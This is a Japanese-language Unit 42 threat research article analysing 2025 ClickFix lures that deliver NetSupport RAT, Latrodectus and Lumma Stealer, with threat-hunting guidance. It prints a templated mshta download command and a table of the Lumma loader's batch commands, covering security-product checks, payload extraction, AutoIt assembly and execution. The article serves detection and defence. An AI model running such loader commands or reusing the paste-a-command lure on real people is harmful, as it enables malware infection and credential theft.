[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
* [Spanish (LATAM)](https://unit42.paloaltonetworks.com/es-la/preventing-clickfix-attack-vector/)
* [French](https://unit42.paloaltonetworks.com/fr/preventing-clickfix-attack-vector/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/preventing-clickfix-attack-vector/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# Clickを修正: ClickFix攻撃ベクターを阻止せよ

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 4 分で読めます  
Related Products  
[![Advanced DNS Security icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced DNS Security](https://unit42.paloaltonetworks.com/ja/product-category/advanced-dns-security-ja/ "Advanced DNS Security")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/ja/product-category/advanced-url-filtering-ja/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Cloud-Delivered Security Services icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Cloud-Delivered Security Services](https://unit42.paloaltonetworks.com/ja/product-category/cloud-delivered-security-services-ja/ "Cloud-Delivered Security Services")[![Cortex icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex](https://unit42.paloaltonetworks.com/ja/product-category/cortex-ja/ "Cortex")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")[![Cortex XSIAM icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XSIAM](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xsiam-ja/ "Cortex XSIAM")[![Unit 42 Incident Response icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/unit42_RGB_logo_Icon_Color.png)Unit 42 Incident Response](https://unit42.paloaltonetworks.com/ja/product-category/unit-42-incident-response-ja/ "Unit 42 Incident Response")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Rem Dudas](https://unit42.paloaltonetworks.com/ja/author/rem-dudas/)
  * [Noa Dekel](https://unit42.paloaltonetworks.com/ja/author/noa-dekel/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2025年7月10日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [AutoIT](https://unit42.paloaltonetworks.com/ja/tag/autoit-ja/)
  * [Lumma Stealer](https://unit42.paloaltonetworks.com/ja/tag/lumma-stealer-ja/)
  * [Malvertising](https://unit42.paloaltonetworks.com/ja/tag/malvertising-ja/)
  * [Remote Access Trojan](https://unit42.paloaltonetworks.com/ja/tag/remote-access-trojan-ja/)
  * [Social engineering](https://unit42.paloaltonetworks.com/ja/tag/social-engineering-ja/)
  * [Typosquatting](https://unit42.paloaltonetworks.com/ja/tag/typosquatting-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/preventing-clickfix-attack-vector/?pdf=download&lg=ja&_wpnonce=5f0cc26d8b "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/preventing-clickfix-attack-vector/?pdf=print&lg=ja&_wpnonce=5f0cc26d8b "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Clickを修正:%20ClickFix攻撃ベクターを阻止せよ&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpreventing-clickfix-attack-vector%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpreventing-clickfix-attack-vector%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpreventing-clickfix-attack-vector%2F&title=Clickを修正:%20ClickFix攻撃ベクターを阻止せよ "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpreventing-clickfix-attack-vector%2F&text=Clickを修正:%20ClickFix攻撃ベクターを阻止せよ "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpreventing-clickfix-attack-vector%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Clickを修正:%20ClickFix攻撃ベクターを阻止せよ%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpreventing-clickfix-attack-vector%2F "Share in Mastodon")

## エグゼクティブ サマリー

この記事では、ClickFixキャンペーンに備えた脅威ハンティングのヒントと緩和策を共有するものです。また2025年に弊社がこれまでに確認した最も著名なClickFixキャンペーンを紹介します。特徴は以下の通りです。

* リモート アクセス型トロイの木馬(RAT)「NetSupport」を配信する攻撃者が、新たなローダーで活動を活発化させている
* Latrodectusマルウェアを配信する攻撃者が、新たなClickFixキャンペーンで被害者を誘い込んでいる
* 新しいテクニックで多業種を狙う「Lumma Stealer」キャンペーンが盛況

ClickFixとは脅威アクターがソーシャル エンジニアリングのルアー(誘い文句)として使用する、近年攻撃者間で人気を集めるテクニックです。この手口は、潜在的な標的を騙して悪意のあるコマンドを実行させるもので、一般的なコンピュータの問題に対する「クイック フィックス(迅速な修正)」を行うものと偽装してこの実行を迫るものです。

このようなキャンペーンは、合法的な製品やサービスの評判を利用することで、その悪質な活動が見破られないように偽装するものであり、実行可能ファイルの作者がマルウェアによって引き起こされた結果について過失や責任を負うことを意味するものではありません。

ClickFixキャンペーンは、以下のようなさまざまな業界の組織に影響を与えてきました。

* ハイテク
* 金融サービス
* 製造業
* 卸売・小売
* 州・地方政府
* 専門・法務サービス
* 公益事業・エネルギー

Unit42は直近でClickFixのルアーがイニシャル アクセス ベクトルであったインシデント レスポンス案件を10件近く支援しています。

効果的なClickFixのルアー(誘い文句)により、成功時には脅威アクターは標的の組織を完全に乗っ取ることができるとされています。このようなルアーは、脅威アクターにとって準備するのは非常に簡単とされており、組織をクレデンシャル収集、メール窃盗、さらにはランサムウェアのインシデントの影響に対して脆弱にするものです。

このテクニックには以下の2つのバリエーションがあります。

* Windowsキー+R(Win+R)を押して、ターゲットに「ファイル名を指定して実行」ウィンドウで悪意のあるコマンドを実行するよう指示する。
* 潜在的な被害者に、Windowsキー＋X(Win＋X)を押して、ターミナルウィンドウで悪意のあるコマンドを実行するよう指示する。

パロアルトネットワークスのお客様は、以下の製品およびサービスを通じて、ここに記載されている脅威に対する確実な保護を構築いただけます。

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)
* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)および[Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)
* [Cortex XDR](https://docs-cortex.paloaltonetworks.com/p/XDR)および[XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM)

情報漏えいの可能性がある場合、または緊急の案件がある場合は、[Unit 42インシデント レスポンス チーム](https://start.paloaltonetworks.com/contact-unit42.html)までご連絡ください。

| **Unit 42の関連トピック** | [**Social Engineering**](https://unit42.paloaltonetworks.com/ja/tag/social-engineering-ja/), **[Malware](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)** ,[**Malvertising**](https://unit42.paloaltonetworks.com/ja/tag/malvertising-ja/) |
|--------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|

## ClickFixのテクニックを解剖

ClickFixのテクニックを検証する前に、ClickFixとは何か、そしてここ数ヶ月でClickFixがどの程度普及したかをよく理解する必要があります。

ClickFixは比較的新しいソーシャル エンジニアリングの手法であり、脅威アクターによって攻撃キャンペーンで使用されることが増えています。この手口は、ターゲットにしたユーザーを惑わし、パフォーマンスの問題やドライバの欠落、ポップアップ エラーなど、一般的なコンピュータの問題に対する「クイックフィックス(迅速な修正)」の適用を促すものです。ここ数ヶ月に確認されたClickFixのテクニックを使ったルアー(誘い文句)の多くは、偽の認証ページに誘導し、閲覧者が意図した目的地に進む前にあるアクションを完了するよう求めるものでした。

脅威アクターは、しばしば以下の媒体に誘い文句を配信しています。

* 合法だが危険なWebサイト
* 不正広告
* YouTubeチュートリアル
* 偽の技術サポートフォーラム

ClickFixのテクニックは[クリップボード ハイジャック](https://www.malwarebytes.com/blog/news/2025/03/fake-captcha-websites-hijack-your-clipboard-to-install-information-stealers)に依存します。ClickFixを使用したWebページは、潜在的な標的のクリップボードに悪意のあるスクリプトやコマンドを注入し、悪意のあるコンテンツを貼り付けて実行するよう指示します。ClickFixのテクニックはユーザーにコンテンツの貼り付けを要求するため「ペースト ジャッキング」と呼ばれることもあります。

攻撃者はClickFixの手法を最初の感染経路として使用し、それに続くペイロードは様々です。あるものは情報窃取ツールを忍ばせたり、あるものはRATをデプロイしたり、セキュリティ ツールを無力化したりします。しかし、どれも標的に攻撃者の仕事をさせること、つまりコードを手動で実行させることに依存しているのが特徴です。

この配信方法は、多くの標準的な検出および防止制御を回避することができます。エクスプロイト攻撃やフィッシング添付ファイル、悪意のあるリンクは必要ありません。その代わりに、標的を誘導し、信頼できるシステム シェルを通じて、無意識のうちに自身でコマンドを実行させます。

この方法によって、ClickFixからの感染は、ドライブバイ ダウンロードや従来のマルウェア ドロッパーよりも検出が複雑になります。しかし、研究者はアーチファクトを探すことでこれらの感染を検出することができます。

### 世界的現象の台頭

弊社ではここ数ヶ月間ClickFixのルアーを注意深く監視し、複数のマルウェア ファミリーを提供する亜種を多数発見しました。図1は、週ごとのケース配信を示したものです。
:chart: 図1.2025年初頭からの週間感染数。

また、図2に示すように、ClickFixが様々な業種に影響を及ぼしていることも分かりました。
![業種別の事業体数を示す棒グラフ。業種は多いものから並べて以下のようになっている。ハイテク, 金融サービス, 製造業, 卸売・小売業, 州・地方政府, 専門職・法律サービス, 公共事業・エネルギー, 製薬・ライフ サイエンス, ホスピタリティ, テレコミュニケーション, ヘルスケア, 連邦政府, 教育。パロアルトネットワークスとUnit 42のロゴがロックアップ。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-338620-149073-2.png) 図2.ClickFixのルアーによって影響を受ける業界の分布。

## ケーススタディ

2025年に私たちがこれまでに観測した最も顕著な3つのキャンペーンは、脅威アクターがClickFixを様々なマルウェア ファミリーの攻撃フローにどのように組み込んでいるかを示しています。

### NetSupport RATがローディングを変更

ClickFix関連の活動調査を通して、2025年5月に活発に行われたキャンペーンを特定しました。このキャンペーンにおいて、NetSupport RATを使用した攻撃者は、以下のような様々な業界に影響を与えています。

* ヘルスケア
* 法的サービス
* 情報通信
* 小売
* 鉱業

NetSupport RATを配信するこのClickFixキャンペーンは、以下のような正規の人気サービスを装った配信ドメインを利用しています。

* DocuSign: 文書を電子的に署名、送信、管理するためのデジタル プラットフォーム。
* Okta: 企業がアプリケーションやシステムへのユーザー アクセスを管理し、保護するためのプラットフォーム。シングル サインオン(SSO)、多要素認証、ID管理サービスを提供している。

脅威アクターはしばしば、その悪意のある目的のために正規の製品を悪用したり、利用したり、破壊したりしますが、これは正規品に欠陥や悪意があることを意味するものではありません。

図3と図4は、偽のDocuSignとOktaのランディングページです。

![PandaDocのなりすましランディング ページ。様々な業界のバッジや信頼できるブランドのロゴを使用し、簡単さと費用対効果を強調した文書署名の代替案について説明している。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-341676-149073-3.png) 図3.docusign.sa\[.\]comにあるDocuSignの偽のランディング ページ。 ![「Verify you are human(あなたが人間であることを確認してください)」と書かれたチェックボックスと、その下にCloudflareのロゴが表示された、なりすましのセキュリティ認証ページのスクリーンショット。テキストはサイトが先に進む前に接続のセキュリティを確認する必要があることを説明している。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-344165-149073-4.png) 図4.oktacheck.it\[\]comにあるOktaの偽ランディングページ。 弊社では、このClickFixキャンペーンは[ClearFake](https://reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/)インフラ上でNetSupport RATを配信していると疑っています。この推察はClickFixのルアー(誘い文句)とClearFakeのインフラの類似性に基づくものであり、どちらも同じロシア語コメントを含み、同じJavaScriptのクリップボード インジェクション機能を使用しています。

ClearFakeは、他のマルウェアが使用するドライブバイ ダウンロード キャンペーンの一環として、侵害されたWebサイト上にデプロイされる悪意のあるJavaScriptフレームワークです。図5は、JavaScript関数unsecuredCopyToClipboardを使ってエンコードされたPowerShellコマンドを注入するClearFakeを示したものです。コード内のロシア語のコメントも示されており、ClearFake開発者の出自を示唆する手がかりとなっています。
![スクリーンショットは2つに分割され、左側が検証ステップ、右側がコンピューターコードを示している。左側には、オレンジ色のインターフェイスが表示され、ウィンドウズキーとRキーを押しながらEnterキーを押すなど、検証ステップを完了するよう指示している。これが最初のステップ。右側は、PowerShellコマンドの修正を示す赤と黒のコード行とロシア語のメモがあるコーディング インターフェース。ステップ2では、難読化されたPowerShellコマンドがユーザーのキーボードに注入されている。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-347415-149073-5.png) 図5.偽DocuSignページのランディング ページとスクリプト インジェクション。

偽の検証ウィンドウは「ファイル名を指定して実行」ダイアログを開き、クリップボードの内容を貼り付ける指示を表示しています。しかしインターフェイスはこれらの指示を、ユーザーが人間であることを証明するテストとして提示しています。標的はWebサイトがその後注入する悪意のあるPowerShellコマンドに気づかない可能性があります(前述のように、これは[pastejacking](https://github.com/dxa4481/Pastejacking)の例です)。

実行されると、コマンドは別のPowerShellスクリプトをダウンロードし、攻撃の次の段階をダウンロードして実行します。この感染チェーンを図6に示します。
![偽のOkta Webサイトのプロンプト、Cmd.exeの実行、および PowerShellを使用したサイバー攻撃により、NetSupport RAT やさまざまな実行可能ファイルを含む悪意のあるソフトウェアがダウンロードおよび実行され、データのインジェクションと流出に至ったことを示すフローチャート。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/JP-Fig6_NetSupportRAT-Infection-Chain-2-628x440.png) 図6.NetSupport RATの感染チェーン。

次のステージは、ZIPアーカイブ内に含まれています。これはjp2launcher.exeを実行するために必要なすべての合法的な依存関係を含むものです。このファイルは、図7が示すように、Javaアプリケーションの起動に使用される正規のJava Runtime Environment(JRE)コンポーネントです。
![主にMicrosoft Windowsのコンポーネントとアプリケーションに関連するファイルのリストを表示するコンピュータの画面のスクリーンショット。各ファイルのエントリには、ファイル名、更新日、タイプ、サイズが表示されている。3つの行が赤枠でハイライトされている。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-354761-149073-7.png) 図7.cmd.exeによってダウンロードされたZIPアーカイブの内容。

まず、cmd.exeがZIPアーカイブをダウンロードし、その内容を解凍して%APPDATA%/Local/Temp/directoryディレクトリに保存します。その後、cmd.exeはjp2launcher.exeを起動し、msvcp140.dllという悪意のあるローダーをサイドロードします。本記事の[付録](#post-149073-_heading=h.id2ekbh4hzaf)では、新しいDLLベースのNetSupport RATローダーの完全な技術分析を提供しています\*\*。\*\*

最後に、DLLはNetSupport RAT (client32.exe)と関連ファイルを含むZIPアーカイブをダウンロードして実行します。NetSupport RATは元は合法的なソフトウェアですが、古いコピーや盗用されたコピーが[さまざまな脅威アクター](https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html)によって悪用されることが多く、通常は侵入やエンドポイント感染のためのRATとして構成されています。

### Latrodectus、ClickFixの新作ルアーを紡ぐ

2025年3月から4月にかけて、弊社の調査チームはLatrodectusが管理するドメインへのトラフィックが増加していることに気づきました。また、Latrodectusを配信する攻撃者が、イニシャル アクセス ベクターにClickFixのテクニックを使い始めたことから、その感染戦略にも変化が見られました。

Latrodectus攻撃の連鎖は、標的が、正規の、しかし侵害されたWebサイトを訪問したときに始まります。その後、ClearFakeインフラストラクチャは、サイト訪問者を偽の検証ページにリダイレクトします。このページでは、「ファイル名を指定して実行」ダイアログを使ってコマンドを実行するよう指示するプロンプトが表示され、悪意のあるJavaScriptバックエンドがエンドポイントのクリップボードにPowerShellコマンドをインジェクションします。

以下の図8は、侵害されたサイトからのルアーとそれに続くリダイレクト チェーンを示したものです。
![キーボード ショートカットを使ってステップを完了するよう指示するキャプチャ認証ページを表示するコンピュータ画面のスクリーンショット。画面には、ブラウザで開いているウェブ開発ツールも表示され、さまざまなスクリプト名が見える。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-357291-149073-8.png) 図8.Latrodectus ClickFix lure。

被害者が注入されたコマンドを貼り付けて実行しても、コマンドそのものは表示されません。表示されるのは、スクリプトの最後のコメント(Cloud Identificator: 2031)で、これは通常の認証プロセスの一部のように見えるものです。しかし、このスクリプトを実行すると、curl.exeを使用してコマンド＆コントロール(C2)サーバーからJavaScriptファイルがダウンロードされます。そして、図9が示すように、Cscriptを介してファイルの実行が行われます。
![ダークモードでのシンタックス ハイライトによるコードスニペット。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-361769-149073-9.png) 図9.ClickFixのルアーから悪意のあるコマンドがターゲットのクリップボードに注入されている。

2024年半ばに出現して以来、攻撃者は、LatrodectusをドロップするMicrosoftソフトウェア インストーラー(MSI)ファイルをダウンロードする悪意のあるJavaScriptファイルを含むチェーンを通じて、Latrodectusを頻繁に配信しています。この場合、実行されたJavaScriptファイル(la.txt)は、リモートサーバーからMSIファイルを取得し、msiexec.exeを使って実行します。

JavaScriptダウンローダーが一般的に肥大化し、無意味なコメントで難読化されていた以前のキャンペーンとは異なり、この亜種はvar\_Apple\_Palantir38やfunc\_Slack\_encryption84など、一見正当な名前を持つ大きなジャンクJSON変数を使用していることが特徴です。図10は、過去と最近のLatrodectusキャンペーンで使用された難読化テクニックを比較したものです。
![左は変数と関数を含むコード スニペット、右はループと条件文を含むコード ブロック。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-364008-149073-10.png) 図10:Latrodectusドロッパーで使用されている最近の難読化技術(左)と過去の難読化技術(右)の比較。

MSIペイロードは標的のディスクに複数のファイルをドロップします。これらには、悪意のあるDLLファイル(libcef.dll)としてドロップされる[Latrodectus](https://www.virustotal.com/gui/file/aef5c150cfe8154ed290b293e30d552cfb9b40b3552369345c7c2f135b63aac4/relations)とDLLをサイドロードする正規のバイナリが含まれます。図11はこれを図解したものです。
![Latrodectus感染チェーンの図。侵害された正規のウェブサイトから始まり、ClickFixの手口を経て、EXEファイルと悪意のあるシェルコードのダウンロードと実行に至る。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/JP-Fig11_Latrodectus-Infection-Chain-1242x700.png) 図11.Latrodectusの感染チェーン。

正規のファイルがLatrodectus用の悪意のあるDLLをサイドロードすると、それ自体にシェルコードを注入します。

2025年5月の[タイムリーな脅威インテリジェンス](https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-05-16-IOCs-on-recent-ClickFix-activity.txt)では、弊社チームがLumma Stealerが攻撃チェーンの最終ペイロードであった同様のLatrodectusキャンペーンを分析しています。

### Lumma Stealerタイポスクワッティング キャンペーン

Lumma Stealerを配信する攻撃者がClickFixの感染テクニックを使い始めたのは[2024年後半](https://www.esentire.com/security-advisories/lumma-stealer-clickfix-distribution)のことですが、2025年4月の時点で、Lumma Stealerに対するClickFix感染の試みが急増していることが確認されています。最近のキャンペーンでは、Lumma Stealerを配信する攻撃者によって以下のような幅広い分野に影響が出ています。

* 自動産業
* エネルギー
* IT
* ソフトウェア

このようなClickFixキャンペーンを調査したところ、ターゲットに「mshta xxxx\[.\]co/xxxxxx =++xxxxx」のような構造のMSHTAコマンドをコピーさせることが判明しました。

攻撃者は各ターゲットに特定の識別子文字列を与え、それを使って一度だけペイロードを受け取ることができるとされています。しかし、弊社の研究者がチェックしたURLでは、感染後、もはやペイロードを配信していませんでした。

ClickFixスクリプトを実行すると、スクリプトはIP Loggerドメインiplogger\[.\]orgとiplogger\[.\]comの[タイポスクワット](https://unit42.paloaltonetworks.com/ja/cybersquatting/)バージョンにビューアをリダイレクトします。IP LoggerはURL短縮とIPトラッキング サービスであり、リンクを作成し、訪問者に関する以下のような情報を記録します。

* IPアドレス
* 地理的位置
* デバイスの詳細
* 閲覧行動

攻撃者がコントロールするタイポスクワット ドメインはiplogger\[.\]coとされ、このドメイン ページは既知の正当なサービスに偽装されています。

このキャンペーンでは、MSHTAコマンドが暗号化されたPowerShellスクリプトをダウンロードし、Lumma Stealerの感染を開始することが確認されています。図12は、感染チェーン全体を示したものです。
![Lumma Stealer感染は、ClickFix、Encode PowerShell、Lumma Stealerなどのエンティティや、コマンド アンド コントロール(C2)サーバーとの連絡、実行可能ファイルの構築、セキュリティ製品の検出など、さまざまな機能を含むマルウェア攻撃のプロセスを描写しています。このチャートは、攻撃のライフサイクル全体を通しての接続と、リソースのドロップや実行コマンドなどのアクションを示している。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/JP-Fig12_LummaStealer-Diagram-scaled.png) 図12.Lumma Stealer感染チェーン。

攻撃者が制御する各リンクは、高度に難読化されBase64エンコードされたPowerShellコマンドをホストし、最終的にPartyContinued.exeという悪意のあるLumma Stealerステージャをドロップして実行させます。この実行ファイルはhxxps\[:\]//pub-\<dynamically generated number string\>.r2\[.\]devでホストされており、正当な開発者のURLのように見えるように名付けられています。

PartyContinued.exeが起動すると、スクリプト言語[AutoIt](https://www.autoitscript.com/wiki/AutoIt_and_Malware)を使用する新しいLummaローディング メソッドがセットアップされます。このバージョンのLumma Stealerは以前のバージョンと似ていますが、Boat.pstという新しいMicrosoftキャビネット アーカイブ(CAB)ファイルが含まれています。このCABファイルはPartyContinued.exeの中にバンドルされ、AutoIt3スクリプトエンジンとLumma Stealerのために実行するAutoItスクリプトを作成するために使用される残りのコンテンツを保持します。

表1は、ローダーが実行するコマンドとその目的をまとめたものです

|--------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------|----------------------------------------------|
| **コマンド**                                                                                                                                               | **内容**                                                                                     | **目的**                                       |
| tasklist | findstr /I "opssvc wrsa"                                                                                                                   | 実行中のプロセスの名前から、大文字と小文字を区別せずにopssvcまたはwrsaを検索する。                                             | エンドポイント セキュリティ ソフトウェアの検出                     |
| tasklist | findstr "bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn"                                                                           | 実行中のプロセスから様々な文字列を検索する。                                                                     | エンドポイント セキュリティ ソフトウェアの検出                     |
| cmd /c md 386354                                                                                                                                       | マルウェアをディスクに保存するためのディレクトリを作成する。                                                             | ペイロードを取り出す場所を設定する                            |
| extrac32 /Y /E Boat.pst                                                                                                                                | Boat.pstという名前の.cabファイルからファイルを抽出し、既存のファイルを上書き(/Y)し、すべてのファイルを抽出(/E)する。                       | ペイロードの取り出し                                   |
| set /p ="MZ" \> 386354\\Slovenia\[.\]com \<nul                                                                                                         | 386354ディレクトリの下にSlovenia\[.\]comという名前のファイルを作成する。                                            | AutoIt3エクゼキューターを構築する                         |
| findstr /V "Tr" Bell \>\> 386354\\Slovenia\[.\]com                                                                                                     | 抽出されたBellという名前のファイルの中で、Trという文字列(大文字と小文字を区別)を含まないすべての行をSlovenia\[.\]comというファイルに追加する。        | AutoIt3エクゼキューターを構築する                         |
| cmd /c copy /b 386354\\Slovenia\[.\]com + Sewing + Monetary + Covered + Health + Loss + Intel + Escape + Tramadol + Apparatus 386354\\Slovenia\[.\]com | copy /bを使ってバイナリファイルを作成する際に、抽出した他のファイルを追加する。その結果AutoIt3.exeのコピーはSlovenia\[.\]comという名前になります。 | AutoIt3エクゼキューターを構築する                         |
| cmd /c copy /b ..\\Presently.pst + ..\\Instantly.pst + ..\\Roy.pst + ..\\Tolerance.pst + ..\\Mailto.pst + ..\\Marco.pst + ..\\Mint.pst G               | Slovenia\[.\]comがAutoIt v3コンパイル スクリプト(.a3x)として実行するGという名前のバイナリを作成する。                        | Lumma Stealerのペイロードを構築する(.a3xファイルとしてバイナリを実行) |
| start Slovenia\[.\]com G                                                                                                                               | Lumma Stealerのバイナリを.a3xファイルとして実行するためのAutoIt3実行コマンド。                                        | Lumma Stealerをロードして実行する                      |
| choice /d y /t 5                                                                                                                                       | .batファイル内のコマンドを5秒待ってから実行する(/t 5)ためのデフォルトオプション(/d)に対して、はい(y)を選択するコマンド。                      | ユーザーの操作なしでLumma Stealerを実行可能にする              |

表1.Lumma Stealerのローダーが実行するコマンド。

表にあるように、Slovenia\[.\]comはAutoIt3スクリプト エンジンAutoIt3.exeのコピーであり、Gという名前のAutoItスクリプト(.a3x)として実行されるバイナリを実行し、攻撃の次の段階を担当します。このバージョンのLatrodectusは、Chromiumベースのブラウザのパスワードを含む機密情報を取得し、sumeriavgv\[.\]digitalにあるC2サーバーへの流出を試みます。

## ClickFix感染の脅威ハンティング

ClickFix攻撃は、容易に検出可能な痕跡を残すことが多く、特にこのようなルアー(誘い文句)を見た人々が管理者用インターフェースを開くことに慣れていない場合、悪意のあるコマンド文字列を実行ウィンドウに貼り付ける可能性が高くなります。

### RunMRUアーティファクトのレビュー

Windowsは、「ファイル名を指定して実行」ウィンドウ(Win + R)から最近実行されたコマンドを保存するレジストリ キーを保持しており、これをRunMRUと呼びます。

HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU

このレジストリキーは、「ファイル名を指定して実行」ウィンドウから実行されたコマンドを保存し、アナリストがこれらのエントリを解析して不審な使い方の兆候を探すことを可能にするものです。

不審なRunMRUの内容に関するいくつかの重要な指標は以下の通りです。

* 難読化されたコンテンツ
* 未知のドメインや不審なドメインからのペイロードのダウンロードや実行に関連するキーワード
* 管理インターフェイスへの呼び出しを示すキーワード

これらのエントリーは、誰かがこのようなコマンドを手動で実行した可能性を示唆するもので、ClickFixの感染フローと一致しています。

### Win + X ClickFixの検出

一部の攻撃者は、RunMRUレジストリ キーでの活動の露呈を避けることを目的としており、クイック アクセス メニューのWin+XでPowerShell(Windows 11)用のターミナル、またはコマンド プロンプト(Windows 10)を起動する手順を代わりに使用しています。[2025年3月の報告](https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2)では、Havocを配信している攻撃者が、このWin+XのClickFixのバリエーションを使用していたことが明らかになっています。

脅威ハンターは、EDRテレメトリーやWindowsイベントログを活用することで、このWin+X ClickFixテクニックの兆候を探すことができます。

* **セキュリティ イベントID4688(プロセス作成):** Explorer.exeによって生成されたpowershell.exeを、%LocalAppData%MicrosoftWindowsWinXフォルダ下のファイルのイベントID4663(Object Access)と関連付けて検索します。
* **シェルの使用パターン:** 対話型ログインの直後に起動される昇格したPowerShellセッション、それに続くネットワーク接続や不審な子プロセス(certutil.exe、mshta.exe、rundll32.exeなど)は、しばしば危険なサインとされます。
